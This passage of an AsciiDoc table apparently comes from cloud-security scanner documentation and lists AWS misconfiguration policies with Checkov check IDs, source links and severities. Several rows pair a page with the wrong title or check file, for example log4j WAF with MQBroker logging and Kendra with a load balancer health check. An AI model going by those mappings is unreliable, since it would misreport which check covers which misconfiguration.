+|xref:ensure-aws-amis-are-encrypted-by-key-management-service-kms-using-customer-managed-keys-cmks.adoc[AWS AMIs are not encrypted by Key Management Service (KMS) using Customer Managed Keys (CMKs)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AMIEncryption.py[CKV_AWS_204] +|LOW + + +|xref:ensure-aws-api-deployments-enable-create-before-destroy.adoc[AWS API deployments do not enable Create before Destroy] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/APIGatewayDeploymentCreateBeforeDestroy.py[CKV_AWS_217] +|LOW + + +|xref:ensure-aws-api-gateway-caching-is-enabled.adoc[AWS API Gateway caching is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/APIGatewayCacheEnable.py[CKV_AWS_120] +|LOW + + +|xref:ensure-aws-api-gateway-domain-uses-a-modern-security-policy.adoc[AWS API Gateway Domain does not use a modern security policy] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/APIGatewayDomainNameTLS.py[CKV_AWS_206] +|LOW + + +|xref:ensure-aws-api-gateway-enables-create-before-destroy.adoc[Ensure AWS API gateway enables Create before Destroy] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/APIGatewayCreateBeforeDestroy.py[CKV_AWS_237] +|LOW + + +|xref:ensure-aws-api-gateway-method-settings-enable-caching.adoc[AWS API Gateway method settings do not enable caching] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEnabled.py[CKV_AWS_225] +|LOW + + +|xref:ensure-aws-app-flow-connector-profile-uses-customer-managed-keys-cmks.adoc[AWS App Flow connector profile does not use Customer Managed Keys (CMKs)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AppFlowConnectorProfileUsesCMK.py[CKV_AWS_264] +|LOW + + +|xref:ensure-aws-app-flow-flow-uses-customer-managed-keys-cmks.adoc[AWS App Flow flow does not use Customer Managed Keys (CMKs)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AppFlowUsesCMK.py[CKV_AWS_263] +|LOW + + +|xref:ensure-aws-appsync-api-cache-is-encrypted-at-rest.adoc[AWS Appsync API Cache is not encrypted at rest] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionAtRest.py[CKV_AWS_214] +|LOW + + +|xref:ensure-aws-appsync-api-cache-is-encrypted-in-transit.adoc[AWS Appsync API Cache is not encrypted in transit] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionInTransit.py[CKV_AWS_215] +|LOW + + +|xref:ensure-aws-appsync-has-field-level-logs-enabled.adoc[AWS AppSync has field-level logs disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AppSyncFieldLevelLogs.py[CKV_AWS_194] +|LOW + + +|xref:ensure-aws-appsync-is-protected-by-waf.adoc[AWS AppSync is not protected by WAF] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppSyncProtectedByWAF.yaml[CKV2_AWS_33] +|LOW + + +|xref:ensure-aws-appsyncs-logging-is-enabled.adoc[AWS AppSync's logging is disabled] +| https://github.com/bridgecrewio/checkov/blob/master/checkov/cloudformation/checks/resource/aws/AppSyncLogging.py[CKV_AWS_193] +|LOW + + +|xref:ensure-aws-authtype-for-your-lambda-function-urls-is-defined.adoc[AWS Lambda function URL AuthType set to NONE] +| https://github.com/bridgecrewio/checkov/blob/master/checkov/cloudformation/checks/resource/aws/LambdaFunctionURLAuth.py[CKV_AWS_258] +|LOW + + +|xref:ensure-aws-batch-job-is-not-defined-as-a-privileged-container.adoc[AWS Batch Job is defined as a privileged container] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/BatchJobIsNotPrivileged.py[CKV_AWS_210] +|LOW + + +|xref:ensure-aws-cloudfront-attached-wafv2-webacl-is-configured-with-amr-for-log4j-vulnerability.adoc[AWS MQBroker audit logging is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MQBrokerAuditLogging.py[CKV_AWS_197] +|LOW + + +|xref:ensure-aws-cloudfront-distribution-is-enabled.adoc[AWS Cloudfront distribution is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudfrontDistributionEnabled.py[CKV_AWS_216] +|LOW + + +|xref:ensure-aws-cloudfront-response-header-policy-enforces-strict-transport-security.adoc[AWS CloudFront response header policy does not enforce Strict Transport Security] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudFrontResponseHeaderStrictTransportSecurity.py[CKV_AWS_259] +|LOW + + +|xref:ensure-aws-cloudsearch-uses-https.adoc[AWS Cloudsearch does not use HTTPs] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudsearchDomainEnforceHttps.py[CKV_AWS_220] +|LOW + + +|xref:ensure-aws-cloudsearch-uses-the-latest-transport-layer-security-tls-1.adoc[AWS Cloudsearch does not use the latest (Transport Layer Security) TLS] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudsearchDomainTLS.py[CKV_AWS_218] +|LOW + + +|xref:ensure-aws-cloudtrail-defines-an-sns-topic.adoc[AWS CloudTrail does not define an SNS Topic] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudtrailDefinesSNSTopic.py[CKV_AWS_252] +|LOW + + +|xref:ensure-aws-cloudtrail-logging-is-enabled.adoc[AWS CloudTrail logging is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudtrailEnableLogging.py[CKV_AWS_251] +|LOW + + +|xref:ensure-aws-cluster-logging-is-encrypted-using-a-customer-managed-key-cmk.adoc[AWS cluster logging is not encrypted using a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ECSClusterLoggingEncryptedWithCMK.py[CKV_AWS_224] +|LOW + + +|xref:ensure-aws-code-artifact-domain-is-encrypted-by-kms-using-a-customer-managed-key-cmk.adoc[AWS Code Artifact Domain is not encrypted by KMS using a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CodeArtifactDomainEncryptedWithCMK.py[CKV_AWS_221] +|LOW + + +|xref:ensure-aws-codecommit-branch-changes-have-at-least-2-approvals.adoc[AWS Codecommit branch changes has less than 2 approvals] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CodecommitApprovalsRulesRequireMin2.py[CKV_AWS_257] +|LOW + + +|xref:ensure-aws-codecommit-is-associated-with-an-approval-rule.adoc[AWS Codecommit is not associated with an approval rule] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml[CKV2_AWS_37] +|LOW + + +|xref:ensure-aws-codepipeline-artifactstore-is-not-encrypted-by-key-management-service-kms-using-a-customer-managed-key-cmk.adoc[AWS CodePipeline artifactStore is not encrypted by Key Management Service (KMS) using a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CodePipelineArtifactsEncrypted.py[CKV_AWS_219] +|LOW + + +|xref:ensure-aws-config-must-record-all-possible-resources.adoc[AWS Config must record all possible resources] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ConfigRecorderRecordsAllGlobalResources.yaml[CKV2_AWS_48] +|MEDIUM + + +|xref:ensure-aws-config-recorder-is-enabled-to-record-all-supported-resources.adoc[AWS Config Recording is disabled] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml[CKV2_AWS_45] +|MEDIUM + + +|xref:ensure-aws-copied-amis-are-encrypted.adoc[AWS copied AMIs are not encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AMICopyIsEncrypted.py[CKV_AWS_235] +|LOW + + +|xref:ensure-aws-dax-cluster-endpoint-uses-transport-layer-security-tls.adoc[AWS DAX cluster endpoint does not use TLS (Transport Layer Security)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DAXEndpointTLS.py[CKV_AWS_239] +|LOW + + +|xref:ensure-aws-db-instance-gets-all-minor-upgrades-automatically.adoc[AWS DB instance does not get all minor upgrades automatically] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py[CKV_AWS_226] +|LOW + + +|xref:ensure-aws-dlm-cross-region-events-are-encrypted-with-a-customer-managed-key-cmk.adoc[AWS DLM cross-region events are not encrypted with a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryptionWithCMK.py[CKV_AWS_254] +|LOW + + +|xref:ensure-aws-dlm-cross-region-events-are-encrypted.adoc[AWS DLM cross-region events are not encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryption.py[CKV_AWS_253] +|LOW + + +|xref:ensure-aws-dlm-cross-region-schedules-are-encrypted-using-a-customer-managed-key-cmk.adoc[AWS DLM cross-region schedules are not encrypted using a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryptionWithCMK.py[CKV_AWS_256] +|LOW + + +|xref:ensure-aws-dlm-cross-region-schedules-are-encrypted.adoc[AWS DLM-cross region schedules are not encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryption.py[CKV_AWS_255] +|LOW + + +|xref:ensure-aws-dms-instance-receives-all-minor-updates-automatically.adoc[AWS DMS instance does not receive all minor updates automatically] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DMSReplicationInstanceMinorUpgrade.py[CKV_AWS_222] +|LOW + + +|xref:ensure-aws-ebs-volume-is-encrypted-by-key-management-service-kms-using-a-customer-managed-key-cmk.adoc[AWS EBS Volume is not encrypted by Key Management Service (KMS) using a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DMSReplicationInstanceEncryptedWithCMK.py[CKV_AWS_212] +|LOW + + +|xref:ensure-aws-ecs-cluster-enables-logging-of-ecs-exec.adoc[AWS ECS Cluster does not enable logging of ECS Exec] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ECSClusterLoggingEnabled.py[CKV_AWS_223] +|LOW + + +|xref:ensure-aws-elasticache-redis-cluster-with-multi-az-automatic-failover-feature-set-to-enabled.adoc[AWS ElastiCache Redis cluster with Multi-AZ Automatic Failover feature set to disabled] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElastiCacheRedisConfiguredAutomaticFailOver.yaml[CKV2_AWS_50] +|MEDIUM + + +|xref:ensure-aws-elasticsearch-domain-uses-an-updated-tls-policy.adoc[AWS Elasticsearch domain does not use an updated TLS policy] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py[CKV_AWS_228] +|LOW + + +|xref:ensure-aws-fsx-openzfs-file-system-is-encrypted-by-aws-key-management-service-kms-using-a-customer-managed-key-cmk.adoc[AWS FSX openzfs is not encrypted by AWS' Key Management Service (KMS) using a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/FSXOpenZFSFileSystemEncryptedWithCMK.py[CKV_AWS_203] +|LOW + + +|xref:ensure-aws-glue-component-is-associated-with-a-security-configuration.adoc[AWS Glue component is not associated with a security configuration] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py[CKV_AWS_195] +|LOW + + +|xref:ensure-aws-guardduty-detector-is-enabled.adoc[AWS GuardDuty detector is enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/GuarddutyDetectorEnabled.py[CKV_AWS_238] +|LOW + + +|xref:ensure-aws-image-builder-distribution-configuration-is-encrypting-ami-by-key-management-service-kms-using-a-customer-managed-key-cmk.adoc[AWS Image Builder Distribution Configuration is not encrypting AMI by Key Management Service (KMS) using a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ImagebuilderDistributionConfigurationEncryptedWithCMK.py[CKV_AWS_199] +|LOW + + +|xref:ensure-aws-image-recipe-ebs-disk-are-encrypted-using-a-customer-managed-key-cmk.adoc[AWS Image Recipe EBS Disk are not encrypted using a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ImagebuilderImageRecipeEBSEncrypted.py[CKV_AWS_200] +|LOW + + +|xref:ensure-aws-kendra-index-server-side-encryption-uses-customer-managed-keys-cmks-1.adoc[AWS Kendra index Server side encryption does not use Customer Managed Keys (CMKs)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/KendraIndexSSEUsesCMK.py[CKV_AWS_262] +|LOW + + +|xref:ensure-aws-kendra-index-server-side-encryption-uses-customer-managed-keys-cmks.adoc[AWS HTTP and HTTPS target groups do not define health check] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py[CKV_AWS_261] +|LOW + + +|xref:ensure-aws-key-management-service-kms-key-is-enabled.adoc[AWS Key Management Service (KMS) key is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/KMSKeyIsEnabled.py[CKV_AWS_227] +|LOW + + +|xref:ensure-aws-keyspace-table-uses-customer-managed-keys-cmks.adoc[AWS Keyspace Table does not use Customer Managed Keys (CMKs)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/KeyspacesTableUsesCMK.py[CKV_AWS_265] +|LOW + + +|xref:ensure-aws-kinesis-firehose-delivery-streams-are-encrypted-with-cmk.adoc[AWS Kinesis Firehose Delivery Streams are not encrypted with CMK] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamUsesCMK.py[CKV_AWS_241] +|LOW + + +|xref:ensure-aws-kinesis-firehoses-delivery-stream-is-encrypted.adoc[AWS Kinesis Firehose's delivery stream is not encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamSSE.py[CKV_AWS_240] +|LOW + + +|xref:ensure-aws-memorydb-data-is-encrypted-in-transit.adoc[AWS MemoryDB data is not encrypted in transit] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MemoryDBClusterIntransitEncryption.py[CKV_AWS_202] +|LOW + + +|xref:ensure-aws-memorydb-is-encrypted-at-rest-by-aws-key-management-service-kms-using-cmks.adoc[AWS MemoryDB is not encrypted at rest by AWS' Key Management Service KMS using CMKs] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MemoryDBEncryptionWithCMK.py[CKV_AWS_201] +|LOW + + +|xref:ensure-aws-mqbroker-audit-logging-is-enabled.adoc[AWS MQBroker audit logging is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MQBrokerAuditLogging.py[CKV_AWS_197] +|LOW + + +|xref:ensure-aws-mqbroker-is-encrypted-by-key-management-service-kms-using-a-customer-managed-key-cmk.adoc[AWS MQBroker is not encrypted by Key Management Service (KMS) using a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MQBrokerEncryptedWithCMK.py[CKV_AWS_209] +|LOW + + +|xref:ensure-aws-mqbroker-version-is-up-to-date.adoc[AWS MQBroker version is not up to date] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MQBrokerVersion.py[CKV_AWS_208] +|LOW + + +|xref:ensure-aws-mqbrokers-minor-version-updates-are-enabled.adoc[AWS MQBroker's minor version updates are disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MQBrokerMinorAutoUpgrade.py[CKV_AWS_207] +|LOW + + +|xref:ensure-aws-mwaa-environment-has-scheduler-logs-enabled.adoc[AWS MWAA environment has scheduler logs disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MWAASchedulerLogsEnabled.py[CKV_AWS_242] +|LOW + + +|xref:ensure-aws-mwaa-environment-has-webserver-logs-enabled.adoc[AWS MWAA environment has webserver logs disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MWAAWebserverLogsEnabled.py[CKV_AWS_244] +|LOW + + +|xref:ensure-aws-mwaa-environment-has-worker-logs-enabled.adoc[AWS MWAA environment has worker logs disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MWAAWorkerLogsEnabled.py[CKV_AWS_243] +|LOW + + +|xref:ensure-aws-rds-cluster-activity-streams-are-encrypted-by-key-management-service-kms-using-customer-managed-keys-cmks.adoc[AWS RDS Cluster activity streams are not encrypted by Key Management Service (KMS) using Customer Managed Keys (CMKs)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSClusterActivityStreamEncryptedWithCMK.py[CKV_AWS_246] +|LOW + + +|xref:ensure-aws-rds-db-snapshot-uses-customer-managed-keys-cmks.adoc[AWS RDS DB snapshot does not use Customer Managed Keys (CMKs)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DBSnapshotCopyUsesCMK.py[CKV_AWS_266] +|LOW + + +|xref:ensure-aws-rds-postgresql-instances-use-a-non-vulnerable-version-of-log-fdw-extension.adoc[AWS RDS PostgreSQL exposed to local file read vulnerability] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py[CKV_AWS_250] +|LOW + + +|xref:ensure-aws-rds-uses-a-modern-cacert.adoc[AWS RDS does not use a modern CaCert] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSCACertIsRecent.py[CKV_AWS_211] +|LOW + +|xref:ensure-aws-replicated-backups-are-encrypted-at-rest-by-key-management-service-kms-using-a-customer-managed-key-cmk.adoc[AWS replicated backups are not encrypted at rest by Key Management Service (KMS) using a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSInstanceAutoBackupEncryptionWithCMK.py[CKV_AWS_245] +|LOW + + +|xref:ensure-aws-ssm-parameter-is-encrypted.adoc[AWS SSM Parameter is not encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/common/graph/checks_infra/base_check.py[CKV2_AWS_34] +|LOW + + +|xref:ensure-aws-terraform-does-not-send-ssm-secrets-to-untrusted-domains-over-http.adoc[AWS Terraform sends SSM secrets to untrusted domains over HTTP] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml[CKV2_AWS_36] +|LOW + + +|xref:ensure-backup-vault-is-encrypted-at-rest-using-kms-cmk.adoc[Backup Vault is not encrypted at rest using KMS CMK] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/BackupVaultEncrypted.py[CKV_AWS_166] +|MEDIUM + + +|xref:ensure-docdb-has-audit-logs-enabled.adoc[DocDB does not have audit logs enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DocDBAuditLogs.py[CKV_AWS_104] +|LOW + + +|xref:ensure-dynamodb-point-in-time-recovery-is-enabled-for-global-tables.adoc[Dynamodb point in time recovery is not enabled for global tables] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DynamoDBGlobalTableRecovery.py[CKV_AWS_165] +|MEDIUM + + +|xref:ensure-ebs-default-encryption-is-enabled.adoc[AWS EBS volume region with encryption is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EBSDefaultEncryption.py[CKV_AWS_106] +|MEDIUM + + +|xref:ensure-emr-cluster-security-configuration-encryption-uses-sse-kms.adoc[AWS EMR cluster is not configured with SSE KMS for data at rest encryption (Amazon S3 with EMRFS)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EMRClusterIsEncryptedKMS.py[CKV_AWS_171] +|MEDIUM + + +|xref:ensure-fx-ontap-file-system-is-encrypted-by-kms-using-a-customer-managed-key-cmk.adoc[AWS fx ontap file system not encrypted using Customer Managed Key] +|https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOntapFSEncryptedWithCMK.py[CKV_AWS_178] +|LOW + + +|xref:ensure-glacier-vault-access-policy-is-not-public-by-only-allowing-specific-services-or-principals-to-access-it.adoc[Glacier Vault access policy is public and not restricted to specific services or principals] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/GlacierVaultAnyPrincipal.py[CKV_AWS_167] +|MEDIUM + + +|xref:ensure-guardduty-is-enabled-to-specific-orgregion.adoc[GuardDuty is not enabled to specific org/region] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml[CKV2_AWS_3] +|LOW + + +|xref:ensure-postgres-rds-has-query-logging-enabled.adoc[AWS Postgres RDS have Query Logging disabled] +| https://github.com/bridgecrewio/checkov/blob/master/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml[CKV2_AWS_30] +|LOW + + +|xref:ensure-provisioned-resources-are-not-manually-modified.adoc[Provisioned resources are manually modified] +|Not Supported +|HIGH + + +|xref:ensure-qldb-ledger-permissions-mode-is-set-to-standard-1.adoc[QLDB ledger permissions mode is not set to STANDARD] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/QLDBLedgerPermissionsMode.py[CKV_AWS_170] +|MEDIUM + + +|xref:ensure-redshift-uses-ssl.adoc[AWS Redshift does not have require_ssl configured] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RedShiftSSL.py[CKV_AWS_105] +|MEDIUM + + +|xref:ensure-route53-a-record-has-an-attached-resource.adoc[Route53 A Record does not have Attached Resource] +| https://github.com/bridgecrewio/checkov/blob/master/checkov/terraform/checks/graph_checks/aws/Route53ARecordAttachedResource.yaml[CKV2_AWS_23] +|MEDIUM + + +|xref:ensure-session-manager-data-is-encrypted-in-transit.adoc[Session Manager data is not encrypted in transit] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentEncryption.py[CKV_AWS_112] +|MEDIUM + + +|xref:ensure-session-manager-logs-are-enabled-and-encrypted.adoc[Deletion protection disabled for load balancer] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentLogging.py[CKV_AWS_113] +|MEDIUM + + +|xref:ensure-sns-topic-policy-is-not-public-by-only-allowing-specific-services-or-principals-to-access-it.adoc[SNS topic policy is public and access is not restricted to specific services or principals] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SNSTopicPolicyAnyPrincipal.py[CKV_AWS_169] +|MEDIUM + + +|xref:ensure-sqs-queue-policy-is-not-public-by-only-allowing-specific-services-or-principals-to-access-it.adoc[SQS queue policy is public and access is not restricted to specific services or principals] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py[CKV_AWS_168] +|HIGH + + +|xref:ensure-that-amazon-elasticache-redis-clusters-have-automatic-backup-turned-on.adoc[Amazon ElastiCache Redis clusters do not have automatic backup turned on] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticBackup.py[CKV_AWS_134] +|LOW + + +|xref:ensure-that-athena-workgroup-is-encrypted.adoc[Athena Workgroup is not encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AthenaWorkgroupEncryption.py[CKV_AWS_159] +|MEDIUM + + +|xref:ensure-that-auto-scaling-is-enabled-on-your-dynamodb-tables.adoc[DynamoDB Tables do not have Auto Scaling enabled] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml[CKV2_AWS_16] +|LOW + + +|xref:ensure-that-aws-lambda-function-is-configured-for-a-dead-letter-queue-dlq.adoc[AWS Lambda function is not configured for a DLQ] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/LambdaDLQConfigured.py[CKV_AWS_116] +|LOW + + +|xref:ensure-that-aws-lambda-function-is-configured-for-function-level-concurrent-execution-limit.adoc[AWS Lambda function is not configured for function-level concurrent execution Limit] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py[CKV_AWS_115] +|LOW + + +|xref:ensure-that-aws-lambda-function-is-configured-inside-a-vpc-1.adoc[AWS Lambda Function is not assigned to access within VPC] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/LambdaInVPC.py[CKV_AWS_117] +|LOW + + +|xref:ensure-that-cloudwatch-log-group-is-encrypted-by-kms.adoc[AWS CloudWatch Log groups encrypted using default encryption key instead of KMS CMK] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudWatchLogGroupKMSKey.py[CKV_AWS_158] +|LOW + + +|xref:ensure-that-codebuild-projects-are-encrypted-1.adoc[CodeBuild projects are not encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CodeBuildEncrypted.py[CKV_AWS_147] +|MEDIUM + + +|xref:ensure-that-dynamodb-tables-are-encrypted.adoc[Unencrypted DynamoDB Tables] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DynamoDBTablesEncrypted.py[CKV_AWS_119] +|LOW + + +|xref:ensure-that-ebs-are-added-in-the-backup-plans-of-aws-backup.adoc[EBS does not have an AWS Backup backup plan] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EBSAddedBackup.yaml[CKV2_AWS_9] +|LOW + + +|xref:ensure-that-ec2-is-ebs-optimized.adoc[EC2 EBS is not optimized] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EC2EBSOptimized.py[CKV_AWS_135] +|LOW + + +|xref:ensure-that-ecr-repositories-are-encrypted.adoc[Unencrypted ECR repositories] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ECRRepositoryEncrypted.py[CKV_AWS_136] +|LOW + + +|xref:ensure-that-elastic-file-system-amazon-efs-file-systems-are-added-in-the-backup-plans-of-aws-backup.adoc[Amazon EFS does not have an AWS Backup backup plan] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EFSAddedBackup.yaml[CKV2_AWS_18] +|LOW + + +|xref:ensure-that-elastic-load-balancers-uses-ssl-certificates-provided-by-aws-certificate-manager.adoc[Elastic load balancers do not use SSL Certificates provided by AWS Certificate Manager] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ELBUsesSSL.py[CKV_AWS_127] +|HIGH + + +|xref:ensure-that-emr-clusters-have-kerberos-enabled.adoc[AWS EMR cluster is not configured with Kerberos Authentication] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EMRClusterKerberosAttributes.py[CKV_AWS_114] +|MEDIUM + + +|xref:ensure-that-only-encrypted-ebs-volumes-are-attached-to-ec2-instances.adoc[Not only encrypted EBS volumes are attached to EC2 instances] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml[CKV2_AWS_2] +|LOW + + +|xref:ensure-that-rds-clusters-and-instances-have-deletion-protection-enabled.adoc[AWS RDS cluster delete protection is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSDeletionProtection.py[CKV_AWS_139] +|LOW + + +|xref:ensure-that-rds-clusters-has-backup-plan-of-aws-backup.adoc[RDS clusters do not have an AWS Backup backup plan] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSClusterHasBackupPlan.yaml[CKV2_AWS_8] +|LOW + + +|xref:ensure-that-rds-database-cluster-snapshot-is-encrypted-1.adoc[AWS RDS DB snapshot is not encrypted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSClusterSnapshotEncrypted.py[CKV_AWS_146] +|MEDIUM + + +|xref:ensure-that-rds-global-clusters-are-encrypted.adoc[Unencrypted RDS global clusters] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSClusterEncrypted.py[CKV_AWS_140] +|LOW + + +|xref:ensure-that-rds-instances-have-backup-policy.adoc[AWS RDS instance without Automatic Backup 